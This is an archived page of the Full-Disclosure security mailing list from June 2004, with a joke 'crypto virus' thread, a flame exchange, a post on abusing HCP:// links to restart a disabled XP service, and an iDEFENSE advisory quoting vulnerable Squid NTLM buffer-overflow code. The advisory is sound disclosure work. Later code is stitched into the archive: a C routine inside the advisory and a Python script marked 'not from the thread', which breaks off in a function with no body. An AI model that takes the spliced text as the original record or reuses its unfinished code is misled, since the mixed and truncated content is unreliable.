Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread Gadi Evron
As this is FD, I feel like answering.

> Who exactly are you?

I'm your brother's cousin's uncle's ex-room mate. (I hope I got the
SpaceBalls quote right).

> You come barreling into FD several months ago, long after it was
> created. Pissing in your pants to have found an unmoderated new
> mailing list. You run around on a spree posting every piece of
> drivel at every possible opportunity. You then latch onto
> bugtraq riding the coat-tails of other people's messages in order
> to get yours approved. Now I see you have insinuated yourself
> into the Risks Digest 23.41 with perhaps a record 3 messages in
> one go.

I have had few communications with you in the past, but unlike other
people who can ignore, decline or laugh, you get all "my p?n*s* is
bigger" and act plain rude. What if I told you I have a dog? Can you
bark louder?

Besides, FD is open for any discussion or anything else. Like you can
send your flames, I can send whatever I want. I usually refrain from
doing it unless I see something on-topic which I feel is important, but
hey... Who am I to dare tell you that you act like an asshole baby who
didn't get his milk for lunch?

> Somebody spends their time and effort analysing a zero day, you
> then have the fucking nerve to complain about that:

I appreciate any hard work, and I appreciate Jelmer's work which I
commented on. I also said that most of his post is about his hate
towards Thor Larholm (which he admits to). That is not professional.
I did ask for clarifications on the 0-day.

But hey, you know what? You know best.

> and then you further demonstrate your cockeyed thought process
> by thinking Jelmer has given you a moment's thought and has
> also 'dragged personal issues and flames into "the thread"'

He said he did.

> "the thread" being his analysis of the zero day that you stuck
> your fat face into in the first place.

Who said I'm fat?

> Like I said go start yet 'another' mailing list if you are so
> desperate for attention. You can be the moderator, the only
> poster, the king of the hill, everything you want to be.

Can I have some chocolate too?

Gadi Evron.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1694 - 33 msgs

2004-06-08 Thread nayana
First the guy asking for the C# security scanner, and now him ... 

What a waste of our time and resources.



> Message: 29
> From: "Billy B. Bilano" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!
> Date: Tue, 8 Jun 2004 14:00:03 -0500
> 
> Oliver! Hello!
> 
> SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
> ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
> urge ALL of you to do the same before this gets out of control!
> 
> Also, Oliver, I am sure I am telling you something you don't know, but you
> have a bunch of crypto code that is more than likely a virus at the end of
> your message! In fact, you are so infected, that it seems the crypto code is
> longer than the entire message you sent! This is probably how it spreads! I
> saw a couple of other people on this thing already that had this same
> symptom.
> 






Re: [Full-Disclosure] analysis (more worms wanted :) )

2004-06-08 Thread Byron L. Sonne

> So far I have analyzed the executables (or scripts) of worms, where
> my aim was to determine the family of an unknown worm.
>
> You can view some pictures at http://www.cwi.nl/~wehner/worms, where
> you can also find more information about the approach I used.
> Note that this is *work in progress*.

Regardless, it is still very interesting! Granted my knowledge of the 
mathematics behind it is certainly sub-optimal, but I believe I can see 
where you're going. Could you perhaps show some code and the actual 
mechanics of the math behind it... sometimes the practical helps me 
understand the theoretical that much better.

I knew there were reasons I stay subscribed to this list... thanks for 
reminding me ;)

--
For Good, return Good. For Evil, return Justice.


[Full-Disclosure] Bug in XP Help and Support, or Don't Be Fooled By Disabled Services

2004-06-08 Thread Trowelfaz
There seems to be another bug in XP's Help and Support. If you disable the
Help and Support service in the Services control panel and a user either
clicks on the Help and Support icon in the start menu, clicks on a URL that
starts with HCP://, or receives an email with a link to HCP:// that will
auto-execute, the service that was previously set to DISABLED will start and
set itself to automatic. This can only be set by an administrator (hmmm,
what user is an XP Home user logged in as - question for the day...), but it
opens up an avenue for an attacker to possibly exploit this service even if
a user believes it is shut down. What is even funnier is that in the KB840374
article, it says that the help and support service cannot be fully patched
if it is disabled. But it can be auto started, can't it? When it is not
supposed to? I always thought that a service that was set to disabled cannot
be set to automatic and started without user intervention. Hmmm, just maybe
I could get that pesky AV software to go disabled or better yet, the task
scheduler looks pretty nice...



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Job 317
Thought I might weigh in with a serious comment (although I might regret
it later ;) ).

Any Web hack attack can be sent using the openssl s_client program. You
pipe your attack over an SSL connection to port 443 (or to whatever port
is defined as an SSL port on the victim host).

This has been around for ages. Actually, I am a little surprised in
retrospect that I haven't seen much use of it.

Maybe I took this a little too seriously but this is nothing new.

Job

On  9-Jun-2004 03:00:18 +0200, you wrote:
> We're all feeling a little silly today. This thread has kept me
> chuckling all day tho. I don't know what's funnier, the tongue-in-cheek
> replies or the serious ones!
>

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Jerry Heidtke
Crypto's not new. We had an outbreak in Milwaukee 11 years ago. It's not 
a virus, nor a worm, however. It's an amoeba!

It caused a lot of "traffic" on certain "ports".
http://www.jsonline.com/news/metro/apr03/131542.asp
http://disted.mcw.edu/mpm/epidemic/milwaukee/Cryptosporidium/Chapter1/titlepage.htm
Gregh wrote:
> I think the original OP just didn't know how to spell some words correctly.
> I believe he actually meant to refer to a "krypto virus" which is one that
> affects the Superman factor meaning that those of us who are supposed to
> know it all and do it all, 24 hours a day without rest or even a shit, would
> start to finally lose that veneer of invulnerability!
> (Stranger from a strange I.T, Planet. Jumps firewalls in a single bound!
> Faster than a 3.4ghz CPU! Look! Up in the sky! It's a bird! It's a plane! Oh
> no, wait - it's chicken bloody little again!)




Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread mark

I found the fix for it.

http://tinyurl.com/37p35




RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Picciano, Anthony
Did I pick or weird day to join this maillist, or is it always this silly?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Micah
McNelly
Sent: Tuesday, June 08, 2004 4:32 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Greatest post of all time.

/me claps.

/m


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread David Hane
We're all feeling a little silly today. This thread has kept me chuckling all 
day tho. I don't know what's funnier, the tongue-in-cheek replies or the 
serious ones!



On Tuesday 08 June 2004 16:06, Picciano, Anthony wrote:
> Did I pick or weird day to join this maillist, or is it always this silly?


[Full-Disclosure] iDEFENSE Security Advisory 06.08.04: Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability

2004-06-08 Thread idlabs-advisories
Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow
Vulnerability

iDEFENSE Security Advisory 06.08.04
www.idefense.com/application/poi/display?id=107&type=vulnerabilities
June 8, 2004

I. BACKGROUND

Squid is a fully-featured Web Proxy Cache designed to run on Unix
systems and supports proxying and caching of HTTP, FTP, and other URLs,
as well as SSL support, cache hierarchies, transparent caching, access
control lists and many other features. More information is available at
http://www.squid-cache.org.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Squid Web
Proxy Cache could allow a remote attacker to execute arbitrary code.
Squid Web Proxy Cache supports Basic, Digest and NTLM authentication.
The vulnerability specifically exists within the NTLM authentication
helper routine, ntlm_check_auth(), located in
helpers/ntlm_auth/SMB/libntlmssp.c:

char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length)
{
int rv;
char pass[25] /*, encrypted_pass[40] */;
char *domain = credentials;
...
memcpy(pass, tmp.str, tmp.l);
...

The function contains a buffer overflow vulnerability due to a lack of
bounds checking on the values copied to the 'pass' variable. Both the
'tmp.str' and 'tmp.l' variables used in the memcpy() call contain
user-supplied data.
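The defensive counterpart to the memcpy() the advisory flags, as an added example that is not part of the advisory or of Squid's own code: a bounded copy that checks the attacker-controlled length against both the bytes actually received and the fixed 25-byte buffer before it touches memory, and reports a failure the caller must treat as an authentication rejection. The `struct lstring` layout, the `copy_password_bounded()` and `try_copy()` helpers, the `PASS_BUF` name and the sample passwords are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical length-prefixed string, standing in for the tmp.str/tmp.l
 * pair the advisory names. Assumed layout, not Squid's own definition. */
struct lstring {
    int         l;    /* length claimed by the incoming NTLM message */
    const char *str;  /* bytes of the field inside the decoded message */
};

/* Fixed buffer size from the advisory: char pass[25]. */
#define PASS_BUF 25

/* Bounded replacement for the flagged memcpy(). Returns 0 and fills
 * 'pass' with a NUL-terminated copy, or -1 when the claimed length is
 * negative, larger than what was actually received, or does not fit in
 * the buffer together with its terminator. Nothing is written on -1. */
int copy_password_bounded(char pass[PASS_BUF], struct lstring tmp,
                          size_t msg_remaining)
{
    if (tmp.str == NULL || tmp.l < 0)
        return -1;
    /* A length larger than the message would read past the packet. */
    if ((size_t)tmp.l > msg_remaining)
        return -1;
    /* Leave room for the terminating NUL: 24 bytes is the maximum. */
    if ((size_t)tmp.l >= PASS_BUF)
        return -1;
    memcpy(pass, tmp.str, (size_t)tmp.l);
    pass[tmp.l] = '\0';
    return 0;
}

/* Probe helper: copies 'pw' while claiming 'claimed' bytes, with the
 * real string length as the amount received. Returns the result code. */
int try_copy(const char *pw, int claimed)
{
    char pass[PASS_BUF];
    struct lstring tmp = { claimed, pw };
    return copy_password_bounded(pass, tmp, strlen(pw));
}

/* Constructed demonstration: one password that fits and one overlong
 * password of the kind the advisory describes. Returns how many copies
 * were accepted; the overlong one must be refused, so the answer is 1. */
int demo_bounded_copy(void)
{
    static const char short_pw[] = "hunter2";
    static const char long_pw[]  = "AAAAAAAAAA" "AAAAAAAAAA"
                                   "AAAAAAAAAA" "AAAAAAAAAA";  /* 40 bytes */
    char pass[PASS_BUF];
    int accepted = 0;

    struct lstring ok  = { (int)strlen(short_pw), short_pw };
    struct lstring bad = { (int)strlen(long_pw),  long_pw  };

    if (copy_password_bounded(pass, ok, sizeof short_pw) == 0)
        accepted++;
    if (copy_password_bounded(pass, bad, sizeof long_pw) == 0)
        accepted++;   /* not reached: 40 >= PASS_BUF */
    return accepted;
}
```

The two checks are deliberately separate: comparing against the bytes received stops an out-of-bounds read of the packet, and comparing against the buffer (including the terminator) stops the stack write the advisory describes. A helper that only guards one of them is still exploitable through the other.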

III. ANALYSIS

A remote attacker can compromise a target system if Squid Proxy is
configured to use the NTLM authentication helper. The attacker can send
an overly long password to overflow the buffer and execute arbitrary
code.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in
Squid-Proxy 2.5.*-STABLE and 3.*-PRE when Squid-Proxy is compiled with
the NTLM helper enabled.

V. WORKAROUNDS

Recompile Squid-Proxy with NTLM handlers disabled.

VI. VENDOR RESPONSE

A patch for this issue is available at:

http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0541 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/27/04  Exploit acquired by iDEFENSE
05/19/04  iDEFENSE Clients notified
05/20/04  Initial vendor notification
05/20/04  Initial vendor response
06/08/04  Public Disclosure

IX. CREDIT

The discoverer wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Gregh
I think the original OP just didn't know how to spell some words correctly.
I believe he actually meant to refer to a "krypto virus" which is one that
affects the Superman factor meaning that those of us who are supposed to
know it all and do it all, 24 hours a day without rest or even a shit, would
start to finally lose that veneer of invulnerability!

(Stranger from a strange I.T, Planet. Jumps firewalls in a single bound!
Faster than a 3.4ghz CPU! Look! Up in the sky! It's a bird! It's a plane! Oh
no, wait - it's chicken bloody little again!)


- Original Message - 
From: "Goudie, Derek" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, June 09, 2004 6:54 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Thanks!  I needed that


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Micah McNelly
Greatest post of all time.

/me claps.

/m
- Original Message -
From: "Goudie, Derek" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:54 PM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Thanks!  I needed that


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Jon
Make sure you block port 80 as well, the dreaded [EMAIL PROTECTED] virus uses this
port. If you see any traffic on there, then chances are you have it.

- Original Message - 
From: "Billy B. Bilano" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 8:00 PM
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Oliver! Hello!
>
> SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
> ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
> urge ALL of you to do the same before this gets out of control!


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Nico Golde
hi,
* Ng, Kenneth (US) <[EMAIL PROTECTED]> [2004-06-08 22:49]:
> Question is, are you supposed to have a SSL server on that box?  If so,
> that's what it is.  If not, then you definitely have a problem.  Try
> connecting to that box with the URL you normally use, just use "https"
> instead of "http".  If you get the "normal" page

normally with a certificate before...

> , then someone turned on
> https without realizing it.  If you get something different, then you
> investigate.

regards nico
-- 
Nico Golde - [EMAIL PROTECTED]
[EMAIL PROTECTED] | [EMAIL PROTECTED] | http://www.ngolde.de
GPG: FF46 E565 5CC1 E2E5 3F69  C739 1D87 E549 7364 7CFF
Is there life after /sbin/halt -p?




Re: [Full-Disclosure] FYI Only - Interesting Dot Net configuration item

2004-06-08 Thread H D Moore
Hi Dan,

That is hilarious, check out the two ASP.Net presentations below :)

http://www.digitaldefense.net/labs/presentations/Breaking.ASP.NET/
http://metasploit.com/confs/index.html

-HD

On Tuesday 08 June 2004 12:53, DAN MORRILL wrote:
> Trace dot axd is a tracing function that can be controlled in the
> web.config file. 

> Web.config file holds configuration data for dot net for the web
> server. 

> all source files (.CS or .VB) can provide information about how the web
> application is set up,

> Just thought I would pass this along as I have not seen anything like
> this posted on the network at all. 



[Full-Disclosure] Second crypto virus discovered in the wild!!!!!

2004-06-08 Thread VB
Hi, all,
I just discovered a new crypto virus. i just got in to my job as IT director
for a major defense contractor. i was smoking some crypto in the parking lot
before coming in and all of a sudden i started coughing, completely out of
the blue. i've never coughed before when smoking the crypto so i know it
must be a virus. i dont think it was a worm, cuz that would have probably
given me diareah or something, right?
please confirm this, i've never seen anything like it, the attacks are still
coming.



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Billy B. Bilano
Oliver! Hello!

SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
urge ALL of you to do the same before this gets out of control!

Also, Oliver, I am sure I am telling you something you don't know, but you
have a bunch of crypto code that is more than likely a virus at the end of
your message! In fact, you are so infected, that it seems the crypto code is
longer than the entire message you sent! This is probably how it spreads! I
saw a couple of other people on this thing already that had this same
symptom.

Good luck, everybody! I hope we can cleanse our systems of this 443 virus!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "Oliver Welter" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 12:43 PM
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> hi Guys,
>
> I'm new to the list, so hello first ;)
> I really don't know if you are just kidding or if I misunderstood your
> post...
> Port 443 is the SecureHTTP protocol (https) - so it is correct that it
> is bound to a webserver process and it is correct that SSL-encrypted
> traffic goes in and out - so what's the matter ?
>
> Oliver
> -- 
> This message was digitally signed
> oliwel's public key: http://www.oliwel.de/oliwel.crt
> Base certificate: http://www.ldv.ei.tum.de/page72
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Valdis . Kletnieks
On Tue, 08 Jun 2004 10:53:29 CDT, "Billy B. Bilano" <[EMAIL PROTECTED]>  said:
> Bill Bilano here, reporting in from the front-lines! I've got some
> disturbing news that I've got to get some answers about while I share. I
> think we're about to come under full hacker attack at any second! And to
> those people that said us folks talking about crypto viruses were being
> chicken littles... let me tell you, the sky just fell! And it is HEAVY!

All: Please read this link before replying further:

http://www.catb.org/~esr/jargon/html/Y/YHBT.html




RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Goudie, Derek
Thanks!  I needed that

-Original Message-
From: Jakob Jünger [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, June 08, 2004 1:01 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

Hi,

I just can admit to what Billy wrote. The Firewall of my PDA is getting
hot. It plays "Yellow Submarine" every time I press the escape key. It
has to be something like this crypto-thing. I don't know what "crypto"
means but it seems to be encrypted with EnglishLanguageProtocol.
Believe me, I have been the administrator of my PDA since I was three
years old.

Jakob

> Whatever ssl is, I don't know but it's using the so-called "ssl"
> port on the web servers.

> But this port 443 is not SSH! Why should it be encrypted? And what
> is this "ssl" thing? I've been in IT for many years and I am now IT
> Director here at the bank... I would think that I would know what
> "ssl" would be. I don't think this worm has anything to do with
> whatever "ssl" is. Does anybody even still use ssl? That's probably
> why the hackers chose it.

> Sorry to say but it is not! I checked my incoming traffic again this
> morning and the attack on port 443 is still coming in full steam ahead! I
> don't know what's going on, but I am about to block that port on my
> firewall. Some nitwit (probably the idiot that was here before I became IT
> Director) somehow, for some reason, deliberately opened port 443 on the
> firewalls!

> I am beginning to think that this is the first wave of the new coming
> global crypto-storm!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread joe
The only thing funnier than this post are the responses to it.

Good show.

Cheers Billy, thanks for the laugh.



   joe
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Billy B. Bilano
Sent: Tuesday, June 08, 2004 11:53 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

Salutations, amigos!

Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!

I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).

There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!

The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)

I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)

I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!

At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!

P.S. I wonder if this virus was from a spam-gang?!

P.P.S. Check out my bloglog in my sig!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Rodrigo Gutierrez
Has George Bush become a security researcher? Htf people can answer to this
thread?... Is this GOBBLES AGAIN?

Rodrigo.- 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Meeusen,
Charles D
Sent: Tuesday, June 08, 2004 13:50
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

"Men like me, we need a room full of clues"

--Doug.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Harlan Carvey
Sent: Tuesday, June 08, 2004 12:40 PM
To: [EMAIL PROTECTED]
Cc: Billy B. Bilano
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Bill,

From your post, you don't seem to have a great deal of
detailed information to share about this issue...
 
> The virus works on port 443. 

Wouldn't it then be, by definition, a worm?

> It seems to accept inbound connections on that port as well and, 
> presumably, awaits for commands from some series of servers elsewhere. 
> Perhaps taking orders?

What information do you have to support this assumption?

> I also captured some of the
> traffic and attempted to analyze it up but it looks like -- you heard 
> it here first, folks -- the payload is encrypted!

If this worm runs over SSL, as you say, then wouldn't you expect it to be
encrypted?  

> Is this the first of a coming
> storm of crypto viruses we've all been eagerly fearing?

Is it?
http://www.us-cert.gov/current/current_activity.html#pct

http://www.cert.org/advisories/CA-2002-27.html

To be totally honest, Bill, I don't see a great deal of information in your
post that supports any of your assertions/assumptions.  If this thing is
spreading the way you say it is, then it's a worm.  

Regardless, there isn't any information in your post that clearly shows that
this worm infects both Windows and Unix hosts.  In fact, one thing that does
seem clear in your post is that you haven't collected any information from
the "infected" hosts, but rather all you've got so far is network traffic
via Ethereal...and to be honest, any worm running over SSL is going to be
encrypted...
 
> At any rate, this is your heads up, folks! You heard it here first! Be 
> on the lookout for this first, very nasty CRYPTO VIRUS!

Thanks.  Noted.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Jakob Jünger
Hi,

I just can admit to what Billy wrote. The Firewall of my PDA is getting
hot. It plays "Yellow Submarine" everytime I press the escape-key. It
has to be something like this crypto-thing. I don't know what "crypto"
means but it seems to be encrypted with EnglishLanguageProtocol.
Believe me, I have been the administrator of my PDA since I was three
years old.

Jakob

> Whatever ssl is, I don't know but it's using the so-called "ssl"
> port on the web servers.

> But this port 443 is not SSH! Why should it be encrypted? And what
> is this "ssl" thing? I've been in IT for many years and I am now IT
> Director here at the bank... I would think that I would know what
> "ssl" would be. I don't think this worm has anything to do with
> whatever "ssl" is. Does anybody even still use ssl? That's probably
> why the hackers chose it.

>Sorry to say but it is not! I checked my incoming traffic again this
morning
>and the attack on port 443 is still coming in full steam ahead! I
don't know
>what's going on, but I am about to block that port on my firewall.
Some
>nitwit (probably the idiot that was here before I became IT Director)
>somehow, for some reason, deliberately opened port 443 on the
firewalls!

>I am beginning to think that this is the first wave of the new coming
global
>crypto-storm!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Billy B. Bilano
Kenneth,

These are insidious hackers!

I did what you said and I am getting an exact duplicate of our web site!
They have probably infiltrated the system and are using this to capture our
customers' login information and passing it back to them encrypted! I can't
believe this!

I've already called a local consulting firm and they will be doing an eval
this Thursday of our security measures that we've taken. Then, I am going to
call the webmaster I just fired over this back in and have him sit in front
of their report and see if he has anything to say for himself. Hah!

Also, right before I wrote this message I blocked port 443 in and out on our
firewall at the bank! I will be going over these servers very carefully
tonight to look for anything wacky or goofy.


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "Ng, Kenneth (US)" <[EMAIL PROTECTED]>
To: "'Billy B. Bilano'" <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:51 PM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Question is, are you supposed to have a SSL server on that box?  If so,
> that's what it is.  If not, then you definitely have a problem.  Try
> connecting to that box with the URL you normally use, just use "https"
> instead of "http".  If you get the "normal" page, then someone turned on
> https without realizing it.  If you get something different, then you
> investigate.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Ng, Kenneth (US)
Question is, are you supposed to have a SSL server on that box?  If so,
that's what it is.  If not, then you definitely have a problem.  Try
connecting to that box with the URL you normally use, just use "https"
instead of "http".  If you get the "normal" page, then someone turned on
https without realizing it.  If you get something different, then you
investigate.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Billy B.
Bilano
Sent: Tuesday, June 08, 2004 12:46 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Steve,

Sorry to say but it is not! I checked my incoming traffic again this morning
and the attack on port 443 is still coming in full steam ahead! I don't know
what's going on, but I am about to block that port on my firewall. Some
nitwit (probably the idiot that was here before I became IT Director)
somehow, for some reason, deliberately opened port 443 on the firewalls!

I am beginning to think that this is the first wave of the new coming global
crypto-storm!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "-, Steve" <--->
To: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:34 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Please tell me this is just a really bad joke?
>
> -Original Message-
> From: Billy B. Bilano
> [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 10:53 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Salutations, amigos!
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
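The check Kenneth Ng describes above (open the usual URL over https instead of http and see whether the same site comes back) can be scripted, and the same script can answer Bill's question of what /etc/services says port 443 is for. This is an added example, not code from the thread; the host names are placeholders, and the /etc/services excerpt is constructed inline so the parsing half runs without a network.

```python
"""Added example (not from the thread): put a name to port 443 and apply the
check Kenneth Ng describes, fetching the site over http and https and
comparing what comes back.  Host names are placeholders; the /etc/services
excerpt is constructed inline so the parsing part runs offline."""
import http.client
import ssl
from typing import Dict, Optional, Tuple

# Constructed excerpt in /etc/services format: name  port/proto  [aliases]  # comment
SERVICES_EXCERPT = """\
# Network services, Internet style (constructed excerpt for this example)
ssh             22/tcp                  # SSH Remote Login Protocol
telnet          23/tcp
http            80/tcp    www www-http  # WorldWideWeb HTTP
https           443/tcp                 # http protocol over TLS/SSL
"""


def parse_services(text: str) -> Dict[Tuple[int, str], str]:
    """Map (port, proto) -> service name; comments and blank lines are skipped."""
    table: Dict[Tuple[int, str], str] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, port_proto = line.split()[:2]
        port, proto = port_proto.split("/")
        table[(int(port), proto)] = name
    return table


def service_for_port(port: int, proto: str = "tcp",
                     text: str = SERVICES_EXCERPT) -> Optional[str]:
    """Name registered for a port, e.g. 443/tcp -> 'https'; None if unlisted."""
    return parse_services(text).get((port, proto))


def fetch(host: str, port: int, use_tls: bool,
          path: str = "/", timeout: float = 5.0) -> Tuple[int, bytes]:
    """GET path from host:port, over TLS when use_tls is set; returns (status, body)."""
    if use_tls:
        ctx = ssl.create_default_context()   # verifies the server certificate
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def _normalize(body: bytes) -> bytes:
    # Collapse whitespace so line-wrapping differences do not count as a change.
    return b" ".join(body.split())


def classify_listener(http_body: bytes, https_body: bytes) -> str:
    """The thread's test: the same page on 80 and 443 means the web server
    simply has TLS enabled ('expected'); anything else needs a closer look."""
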